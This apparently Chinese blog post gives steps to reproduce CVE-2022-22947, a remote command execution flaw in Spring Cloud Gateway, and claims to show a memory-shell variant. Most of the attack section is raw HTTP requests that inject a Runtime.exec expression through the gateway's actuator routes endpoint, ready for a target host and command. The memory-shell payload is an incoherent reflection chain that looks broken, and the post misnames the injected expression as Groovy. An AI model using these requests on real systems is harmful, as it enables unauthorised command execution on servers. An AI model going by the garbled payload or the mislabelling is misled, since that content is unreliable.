springboot gateway命令执行漏洞复现(CVE-2022-22947)+内存马

该问题涉及到Spring Cloud Gateway中的一个命令执行漏洞(CVE-2022-22947),该漏洞允许未授权攻击者通过发送特制的HTTP请求在目标服务器上执行任意命令。

复现该漏洞的步骤如下:

  1. 确保你有一个Spring Boot应用程序正在使用Spring Cloud Gateway。
  2. 使用漏洞利用工具或者手动发送一个HTTP请求,利用Groovy模板表达式注入执行任意命令。

例如,使用如下的HTTP请求可以尝试触发漏洞:




POST /actuator/gateway/routes/hackhttp://command_exec_endpoint HTTP/1.1
Host: your-gateway-host
Accept: */*
Content-Length: length
Content-Type: application/json
 
{
  "id": "hack",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "${T(java.lang.Runtime).getRuntime().exec('your-command')}"
    }
  }],
  "uri": "http://command_exec_endpoint",
  "order": 0
}

替换your-gateway-host为你的网关服务器地址,your-command为你想执行的命令。

针对内存马的需求,你可以在Groovy表达式中使用Base64编码的payload来执行。




POST /actuator/gateway/routes/hack HTTP/1.1
Host: your-gateway-host
Accept: */*
Content-Length: length
Content-Type: application/json
 
{
  "id": "hack",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "${T(java.lang.Runtime).getRuntime().exec(T(java.lang.String).forName(T(java.lang.ClassLoader).getSystemClassLoader().loadClass('java.lang.Runtime').getDeclaredMethod('getDeclaredMethod', T(java.lang.Class).forName('[Ljava.lang.Class;')).invoke(null, T(java.lang.Class).forName('[Ljava.lang.Class;').cast([T(java.io.Serializable).class])).getDeclaredMethod('getSystemClassLoader').invoke(null), 'getResourceAsStream', T(java.lang.Class).forName('java.lang.Class')).getResourceAsStream('your-payload-resource').text)}"
    }
  }],
  "uri": "http://command_exec_endpoint",
  "order": 0
}

替换your-payload-resource为你的内存马资源路径。

请注意,实际操作时应确保你有权限执行命令和修改路由配置,且应遵守相关法律法规和道德标准,不得用于非法活动。

最后修改于:2024年09月03日 17:31

评论已关闭

推荐阅读

DDPG 模型解析,附Pytorch完整代码
2024年11月24日
DQN 模型解析,附Pytorch完整代码
2024年11月24日
AIGC实战——Transformer模型
2024年12月01日
Socket TCP 和 UDP 编程基础(Python)
2024年11月30日
python , tcp , udp
如何使用 ChatGPT 进行学术润色?你需要这些指令
2024年12月01日
AI
最新 Python 调用 OpenAi 详细教程实现问答、图像合成、图像理解、语音合成、语音识别(详细教程)
2024年11月24日
ChatGPT 和 DALL·E 2 配合生成故事绘本
2024年12月01日
omegaconf,一个超强的 Python 库!
2024年11月24日
【视觉AIGC识别】误差特征、人脸伪造检测、其他类型假图检测
2024年12月01日
[超级详细]如何在深度学习训练模型过程中使用 GPU 加速
2024年11月29日
Python 物理引擎pymunk最完整教程
2024年11月27日
MediaPipe 人体姿态与手指关键点检测教程
2024年11月27日
深入了解 Taipy:Python 打造 Web 应用的全面教程
2024年11月26日
基于Transformer的时间序列预测模型
2024年11月25日
Python在金融大数据分析中的AI应用(股价分析、量化交易)实战
2024年11月25日
AIGC Gradio系列学习教程之Components
2024年12月01日
Python3 `asyncio` — 异步 I/O,事件循环和并发工具
2024年11月30日
llama-factory SFT系列教程:大模型在自定义数据集 LoRA 训练与部署
2024年12月01日
Python 多线程和多进程用法
2024年11月24日
Python socket详解,全网最全教程
2024年11月27日